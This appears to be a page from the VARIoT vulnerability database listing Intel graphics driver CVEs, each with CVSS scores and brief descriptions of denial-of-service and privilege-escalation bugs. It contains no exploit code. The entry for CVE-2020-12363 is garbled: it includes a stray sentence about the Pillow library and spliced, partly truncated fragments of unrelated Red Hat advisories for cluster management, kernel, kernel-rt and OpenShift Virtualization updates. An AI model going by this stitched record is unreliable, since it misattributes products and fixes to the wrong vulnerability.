VARIoT IoT vulnerabilities database
| VAR-202102-0077 | CVE-2020-12371 | Intel(R) Graphics Drivers Vulnerability for division by zero in |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
Divide by zero in some Intel(R) Graphics Drivers before version 26.20.100.8141 may allow a privileged user to potentially enable a denial of service via local access. Intel(R) Graphics Drivers Is vulnerable to division by zero.Denial of service (DoS) It may be put into a state. There is a security vulnerability in Intel Graphics Drivers. There is no information about this vulnerability at present. Please pay attention to CNNVD or manufacturer announcements at any time
| VAR-202102-0076 | CVE-2020-12370 | Intel(R) Graphics Drivers Buffer Error Vulnerability |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
Untrusted pointer dereference in some Intel(R) Graphics Drivers before version 26.20.100.8141 may allow a privileged user to potentially enable a denial of service via local access. Intel(R) Graphics Drivers Is vulnerable to a buffer error.Denial of service (DoS) It may be put into a state. There is a security vulnerability in Intel Graphics Drivers. There is no information about this vulnerability at present. Please pay attention to CNNVD or manufacturer announcements at any time
| VAR-202102-0075 | CVE-2020-12369 | Intel(R) Graphics Drivers Out-of-bounds Vulnerability in Microsoft |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Out of bound write in some Intel(R) Graphics Drivers before version 26.20.100.8336 may allow a privileged user to potentially enable escalation of privilege via local access. Intel(R) Graphics Drivers Is vulnerable to an out-of-bounds write.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. There is a security vulnerability in Intel Graphics Drivers. There is no information about this vulnerability at present. Please pay attention to CNNVD or manufacturer announcements at any time
| VAR-202102-0074 | CVE-2020-12368 | Intel(R) Graphics Drivers Integer overflow vulnerability in |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Integer overflow in some Intel(R) Graphics Drivers before version 26.20.100.8141 may allow a privileged user to potentially enable an escalation of privilege via local access. Intel(R) Graphics Drivers Exists in an integer overflow vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. There is a security vulnerability in Intel Graphics Drivers. There is no information about this vulnerability at present. Please pay attention to CNNVD or manufacturer announcements at any time
| VAR-202102-0073 | CVE-2020-12367 | Intel(R) Graphics Drivers Integer overflow vulnerability in |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Integer overflow in some Intel(R) Graphics Drivers before version 26.20.100.8476 may allow a privileged user to potentially enable an escalation of privilege via local access. Intel(R) Graphics Drivers Exists in an integer overflow vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. There is a security vulnerability in Intel Graphics Drivers. There is no information about this vulnerability at present. Please pay attention to CNNVD or manufacturer announcements at any time
| VAR-202102-0072 | CVE-2020-12366 | Intel(R) Graphics Drivers Input confirmation vulnerability |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Insufficient input validation in some Intel(R) Graphics Drivers before version 27.20.100.8587 may allow a privileged user to potentially enable an escalation of privilege via local access. Intel(R) Graphics Drivers Is vulnerable to input validation.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. There is a security vulnerability in Intel Graphics Drivers. There is no information about this vulnerability at present. Please pay attention to CNNVD or manufacturer announcements at any time
| VAR-202102-0071 | CVE-2020-12365 | Intel(R) Graphics Drivers Buffer Error Vulnerability |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
Untrusted pointer dereference in some Intel(R) Graphics Drivers before versions 15.33.51.5146, 15.45.32.5145, 15.36.39.5144 and 15.40.46.5143 may allow an authenticated user to potentially denial of service via local access. Intel(R) Graphics Drivers Is vulnerable to a buffer error.Denial of service (DoS) It may be put into a state. There is a security vulnerability in Intel Graphics Drivers. There is no information about this vulnerability at present. Please pay attention to CNNVD or manufacturer announcements at any time
| VAR-202102-0067 | CVE-2020-12361 | Intel(R) Graphics Drivers Vulnerabilities in the use of freed memory |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
Use after free in some Intel(R) Graphics Drivers before version 15.33.51.5146 may allow an authenticated user to potentially enable denial of service via local access. There is a security vulnerability in Intel Graphics Drivers. There is no information about this vulnerability at present. Please pay attention to CNNVD or manufacturer announcements at any time
| VAR-202102-0054 | CVE-2020-0521 | Intel(R) Graphics Drivers Vulnerability in |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Insufficient control flow management in some Intel(R) Graphics Drivers before version 15.45.32.5145 may allow an authenticated user to potentially enable escalation of privilege via local access. Intel(R) Graphics Drivers Contains an unspecified vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. There is a security vulnerability in Intel Graphics Drivers. There is no information about this vulnerability at present. Please pay attention to CNNVD or manufacturer announcements at any time
| VAR-202102-0053 | CVE-2020-0518 | Intel(R) HD Graphics Control Panel Vulnerability in |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
Improper access control in the Intel(R) HD Graphics Control Panel before version 15.40.46.5144 and 15.36.39.5143 may allow an authenticated user to potentially enable denial of service via local access. There is no information about this vulnerability at present. Please keep an eye on CNNVD or the manufacturer's announcement
| VAR-202102-0052 | CVE-2020-0544 | Intel(R) Graphics Drivers Vulnerability in |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Insufficient control flow management in the kernel mode driver for some Intel(R) Graphics Drivers before version 15.36.39.5145 may allow an authenticated user to potentially enable escalation of privilege via local access. Intel(R) Graphics Drivers Contains an unspecified vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. There is a security vulnerability in Intel Graphics Drivers. There is no information about this vulnerability at present. Please pay attention to CNNVD or manufacturer announcements at any time
| VAR-202102-0069 | CVE-2020-12363 | Windows and Linux for Intel(R) Graphics Drivers Input confirmation vulnerability |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
Improper input validation in some Intel(R) Graphics Drivers for Windows* before version 26.20.100.7212 and before Linux kernel version 5.5 may allow a privileged user to potentially enable a denial of service via local access. Pillow is a Python-based image processing library.
There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. There is a security vulnerability in Intel Graphics Drivers. There is no information about this vulnerability at present. Please pay attention to CNNVD or manufacturer announcements at any time. Description:
Red Hat Advanced Cluster Management for Kubernetes 2.2.4 images
Red Hat Advanced Cluster Management for Kubernetes provides the
capabilities to address common challenges that administrators and site
reliability
engineers face as they work across a range of public and private cloud
environments.
Clusters and applications are all visible and managed from a single
console—with security policy built in. See
the following Release Notes documentation, which will be updated shortly
for
this release, for additional details about this release:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana
gement_for_kubernetes/2.2/html/release_notes/
Security fixes:
* redisgraph-tls: redis: integer overflow when configurable limit for
maximum supported bulk input size is too big on 32-bit platforms
(CVE-2021-21309)
* console-header-container: nodejs-netmask: improper input validation of
octal input data (CVE-2021-28092)
* console-container: nodejs-is-svg: ReDoS via malicious string
(CVE-2021-28918)
Bug fixes:
* RHACM 2.2.4 images (BZ# 1957254)
* Enabling observability for OpenShift Container Storage with RHACM 2.2 on
OCP 4.7 (BZ#1950832)
* ACM Operator should support using the default route TLS (BZ# 1955270)
* The scrolling bar for search filter does not work properly (BZ# 1956852)
* Limits on Length of MultiClusterObservability Resource Name (BZ# 1959426)
* The proxy setup in install-config.yaml is not worked when IPI installing
with RHACM (BZ# 1960181)
* Unable to make SSH connection to a Bitbucket server (BZ# 1966513)
* Observability Thanos store shard crashing - cannot unmarshall DNS message
(BZ# 1967890)
3. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):
1932634 - CVE-2021-21309 redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms
1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string
1944827 - CVE-2021-28918 nodejs-netmask: improper input validation of octal input data
1950832 - Enabling observability for OpenShift Container Storage with RHACM 2.2 on OCP 4.7
1952150 - [DDF] It would be great to see all the options available for the bucket configuration and which attributes are mandatory
1954506 - [DDF] Table does not contain data about 20 clusters. Now it's difficult to estimate CPU usage with larger clusters
1954535 - Reinstall Submariner - No endpoints found on one cluster
1955270 - ACM Operator should support using the default route TLS
1956852 - The scrolling bar for search filter does not work properly
1957254 - RHACM 2.2.4 images
1959426 - Limits on Length of MultiClusterObservability Resource Name
1960181 - The proxy setup in install-config.yaml is not worked when IPI installing with RHACM.
1963128 - [DDF] Please rename this to "Amazon Elastic Kubernetes Service"
1966513 - Unable to make SSH connection to a Bitbucket server
1967357 - [DDF] When I clicked on this yaml, I get a HTTP 404 error.
1967890 - Observability Thanos store shard crashing - cannot unmarshal DNS message
5. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Important: kernel security and bug fix update
Advisory ID: RHSA-2021:2314-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2021:2314
Issue date: 2021-06-08
CVE Names: CVE-2020-8648 CVE-2020-12362 CVE-2020-12363
CVE-2020-12364 CVE-2020-27170 CVE-2021-3347
=====================================================================
1. Summary:
An update for kernel is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
3. Description:
The kernel packages contain the Linux kernel, the core of any Linux
operating system.
Security Fix(es):
* kernel: Integer overflow in Intel(R) Graphics Drivers (CVE-2020-12362)
* kernel: Use after free via PI futex state (CVE-2021-3347)
* kernel: use-after-free in n_tty_receive_buf_common function in
drivers/tty/n_tty.c (CVE-2020-8648)
* kernel: Improper input validation in some Intel(R) Graphics Drivers
(CVE-2020-12363)
* kernel: Null pointer dereference in some Intel(R) Graphics Drivers
(CVE-2020-12364)
* kernel: Speculation on pointer arithmetic against bpf_context pointer
(CVE-2020-27170)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
Bug Fix(es):
* kernel crash when call the timer function
(sctp_generate_proto_unreach_event) of sctp module (BZ#1707184)
* SCSI error handling process on HP P440ar controller gets stuck
indefinitely in device reset operation (BZ#1830268)
* netfilter: reproducible deadlock on nft_log module autoload (BZ#1858329)
* netfilter: NULL pointer dereference in nf_tables_set_lookup()
(BZ#1873171)
* [DELL EMC 7.9 Bug]: No acpi_pad threads on top command for "power cap
policy equal to 0 watts" (BZ#1883174)
* A race between i40e_ndo_set_vf_mac() and i40e_vsi_clear() in the i40e
driver causes a use after free condition of the kmalloc-4096 slab cache.
(BZ#1886003)
* netxen driver performs poorly with RT kernel (BZ#1894274)
* gendisk->disk_part_tbl->last_lookup retains pointer after partition
deletion (BZ#1898596)
* Kernel experiences panic in update_group_power() due to division error
even with Bug 1701115 fix (BZ#1910763)
* RHEL7.9 - zfcp: fix handling of FCP_RESID_OVER bit in fcp ingress path
(BZ#1917839)
* RHEL7.9 - mm/THP: do not access vma->vm_mm after calling handle_userfault
(BZ#1917840)
* raid: wrong raid io account (BZ#1927106)
* qla2x00_status_cont_entry() missing upstream patch that prevents
unnecessary ABRT/warnings (BZ#1933784)
* RHEL 7.9.z - System hang caused by workqueue stall in qla2xxx driver
(BZ#1937945)
* selinux: setsebool can trigger a deadlock (BZ#1939091)
* [Hyper-V][RHEL-7] Cannot boot kernel 3.10.0-1160.21.1.el7.x86_64 on
Hyper-V (BZ#1941841)
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect.
5. Bugs fixed (https://bugzilla.redhat.com/):
1802559 - CVE-2020-8648 kernel: use-after-free in n_tty_receive_buf_common function in drivers/tty/n_tty.c
1922249 - CVE-2021-3347 kernel: Use after free via PI futex state
1930246 - CVE-2020-12362 kernel: Integer overflow in Intel(R) Graphics Drivers
1930249 - CVE-2020-12363 kernel: Improper input validation in some Intel(R) Graphics Drivers
1930251 - CVE-2020-12364 kernel: Null pointer dereference in some Intel(R) Graphics Drivers
1940627 - CVE-2020-27170 kernel: Speculation on pointer arithmetic against bpf_context pointer
1941841 - [Hyper-V][RHEL-7] Cannot boot kernel 3.10.0-1160.21.1.el7.x86_64 on Hyper-V
6. Package List:
Red Hat Enterprise Linux Client (v. 7):
Source:
kernel-3.10.0-1160.31.1.el7.src.rpm
noarch:
kernel-abi-whitelists-3.10.0-1160.31.1.el7.noarch.rpm
kernel-doc-3.10.0-1160.31.1.el7.noarch.rpm
x86_64:
bpftool-3.10.0-1160.31.1.el7.x86_64.rpm
bpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-devel-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-devel-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-headers-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-libs-3.10.0-1160.31.1.el7.x86_64.rpm
perf-3.10.0-1160.31.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
python-perf-3.10.0-1160.31.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
bpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-libs-devel-3.10.0-1160.31.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
kernel-3.10.0-1160.31.1.el7.src.rpm
noarch:
kernel-abi-whitelists-3.10.0-1160.31.1.el7.noarch.rpm
kernel-doc-3.10.0-1160.31.1.el7.noarch.rpm
x86_64:
bpftool-3.10.0-1160.31.1.el7.x86_64.rpm
bpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-devel-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-devel-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-headers-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-libs-3.10.0-1160.31.1.el7.x86_64.rpm
perf-3.10.0-1160.31.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
python-perf-3.10.0-1160.31.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
bpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-libs-devel-3.10.0-1160.31.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
kernel-3.10.0-1160.31.1.el7.src.rpm
noarch:
kernel-abi-whitelists-3.10.0-1160.31.1.el7.noarch.rpm
kernel-doc-3.10.0-1160.31.1.el7.noarch.rpm
ppc64:
bpftool-3.10.0-1160.31.1.el7.ppc64.rpm
bpftool-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-bootwrapper-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-debug-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-debug-devel-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-debuginfo-common-ppc64-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-devel-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-headers-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-tools-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-tools-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-tools-libs-3.10.0-1160.31.1.el7.ppc64.rpm
perf-3.10.0-1160.31.1.el7.ppc64.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm
python-perf-3.10.0-1160.31.1.el7.ppc64.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm
ppc64le:
bpftool-3.10.0-1160.31.1.el7.ppc64le.rpm
bpftool-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-bootwrapper-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-debug-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-debuginfo-common-ppc64le-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-devel-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-headers-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-tools-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-tools-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-tools-libs-3.10.0-1160.31.1.el7.ppc64le.rpm
perf-3.10.0-1160.31.1.el7.ppc64le.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm
python-perf-3.10.0-1160.31.1.el7.ppc64le.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm
s390x:
bpftool-3.10.0-1160.31.1.el7.s390x.rpm
bpftool-debuginfo-3.10.0-1160.31.1.el7.s390x.rpm
kernel-3.10.0-1160.31.1.el7.s390x.rpm
kernel-debug-3.10.0-1160.31.1.el7.s390x.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.s390x.rpm
kernel-debug-devel-3.10.0-1160.31.1.el7.s390x.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.s390x.rpm
kernel-debuginfo-common-s390x-3.10.0-1160.31.1.el7.s390x.rpm
kernel-devel-3.10.0-1160.31.1.el7.s390x.rpm
kernel-headers-3.10.0-1160.31.1.el7.s390x.rpm
kernel-kdump-3.10.0-1160.31.1.el7.s390x.rpm
kernel-kdump-debuginfo-3.10.0-1160.31.1.el7.s390x.rpm
kernel-kdump-devel-3.10.0-1160.31.1.el7.s390x.rpm
perf-3.10.0-1160.31.1.el7.s390x.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.s390x.rpm
python-perf-3.10.0-1160.31.1.el7.s390x.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.s390x.rpm
x86_64:
bpftool-3.10.0-1160.31.1.el7.x86_64.rpm
bpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-devel-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-devel-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-headers-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-libs-3.10.0-1160.31.1.el7.x86_64.rpm
perf-3.10.0-1160.31.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
python-perf-3.10.0-1160.31.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64:
bpftool-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-debuginfo-common-ppc64-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-tools-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-tools-libs-devel-3.10.0-1160.31.1.el7.ppc64.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm
ppc64le:
bpftool-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-debug-devel-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-debuginfo-common-ppc64le-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-tools-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-tools-libs-devel-3.10.0-1160.31.1.el7.ppc64le.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm
x86_64:
bpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-libs-devel-3.10.0-1160.31.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
kernel-3.10.0-1160.31.1.el7.src.rpm
noarch:
kernel-abi-whitelists-3.10.0-1160.31.1.el7.noarch.rpm
kernel-doc-3.10.0-1160.31.1.el7.noarch.rpm
x86_64:
bpftool-3.10.0-1160.31.1.el7.x86_64.rpm
bpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-devel-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-devel-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-headers-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-libs-3.10.0-1160.31.1.el7.x86_64.rpm
perf-3.10.0-1160.31.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
python-perf-3.10.0-1160.31.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64:
bpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-libs-devel-3.10.0-1160.31.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2020-8648
https://access.redhat.com/security/cve/CVE-2020-12362
https://access.redhat.com/security/cve/CVE-2020-12363
https://access.redhat.com/security/cve/CVE-2020-12364
https://access.redhat.com/security/cve/CVE-2020-27170
https://access.redhat.com/security/cve/CVE-2021-3347
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBYL/x1NzjgjWX9erEAQijGA//bxt7JJkdkIO3eT3vTQ6mYtMErGKBVx8A
sI+zjh/mYmaocA6UrE88bV1ixfJ2xknb9HfFBjQywPAiqTiRXHUyiL24IyGe5Lit
WkPjLRDHCb/q56rl1EGkyr3noikZCNuNF9HOf8PHukJmLqD6iLWWws8J0knY9QyR
/8scePwyCR4wqr2ru5etg5TKx+pkOY+Dfnwhgy6U2thQI58/Flvn7GyOBvSG69M8
6gewtkav1Fnw7WlLT386OjrAajBw6Pd9xee+S7T9qFv/BfC5k0HA26qbnMaAfzle
YKXmjoIV7ExiszvspqZgdlsg0835BUALUIikbpnTvh7Kl2MY2BhBIqJvKOWeT3Mp
VIpkMs4HVALkHoDqzYDZx8WKEy0hrDAjczT+aWtvXJmHEBmsHEx5Ny8tvYk1w3t/
cNVvfj+EqFaSY1GSNY1MG2ZDzIDYWrx+rGKA7tgqtwSlCdYEbORlXCDu+W8+c7Xg
g1vE8kfpkbxyLpvlJ0iOWoLiOCCrZ04fiXXhgSn9O1/zmOwkijFHk5x/aFDEoyBE
O/s2rawA1cADPiLTxGWU9/MITpQuS+FuAc235HT8VRSXvsV3ZHB36N1z4JZcPB5P
FN8hH+ibnEOlpKC7YOE9K4eQ/jG1etWhVWctf7HcP2nbQSpiiZQoQGPznvt+6OKQ
XAOam1B//x4=
=HTlr
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://listman.redhat.com/mailman/listinfo/rhsa-announce
. 7) - noarch, x86_64
3. Description:
The kernel-rt packages provide the Real Time Linux Kernel, which enables
fine-tuning for systems with extremely high determinism requirements.
Bug Fix(es):
* lru-add-drain workqueue on RT is allocated without being used
(BZ#1894587)
* kernel-rt: update to the latest RHEL7.9.z source tree (BZ#1953118)
4. Description:
OpenShift Virtualization is Red Hat's virtualization solution designed for
Red Hat OpenShift Container Platform. Bugs fixed (https://bugzilla.redhat.com/):
1918750 - CVE-2021-3114 golang: crypto/elliptic: incorrect operations on the P-224 curve
1945703 - "Guest OS Info" availability in VMI describe is flaky
1958816 - [2.6.z] KubeMacPool fails to start due to OOM likely caused by a high number of Pods running in the cluster
1963275 - migration controller null pointer dereference
1965099 - Live Migration double handoff to virt-handler causes connection failures
1965181 - CDI importer doesn't report AwaitingVDDK like it used to
1967086 - Cloning DataVolumes between namespaces fails while creating cdi-upload pod
1967887 - [2.6.6] nmstate is not progressing on a node and not configuring vlan filtering that causes an outage for VMs
1969756 - Windows VMs fail to start on air-gapped environments
1970372 - Virt-handler fails to verify container-disk
1973227 - segfault in virt-controller during pdb deletion
1974084 - 2.6.6 containers
1975212 - No Virtual Machine Templates Found [EDIT - all templates are marked as depracted]
1975727 - [Regression][VMIO][Warm] The third precopy does not end in warm migration
1977756 - [2.6.z] PVC keeps in pending when using hostpath-provisioner
1982760 - [v2v] no kind VirtualMachine is registered for version \"kubevirt.io/v1\" i...
1986989 - OpenShift Virtualization 2.6.z cannot be upgraded to 4.8.0 initially deployed starting with <= 4.8
5
| VAR-202102-0070 | CVE-2020-12364 | Windows and Linux for Intel(R) Graphics Drivers In NULL Pointer dereference vulnerability |
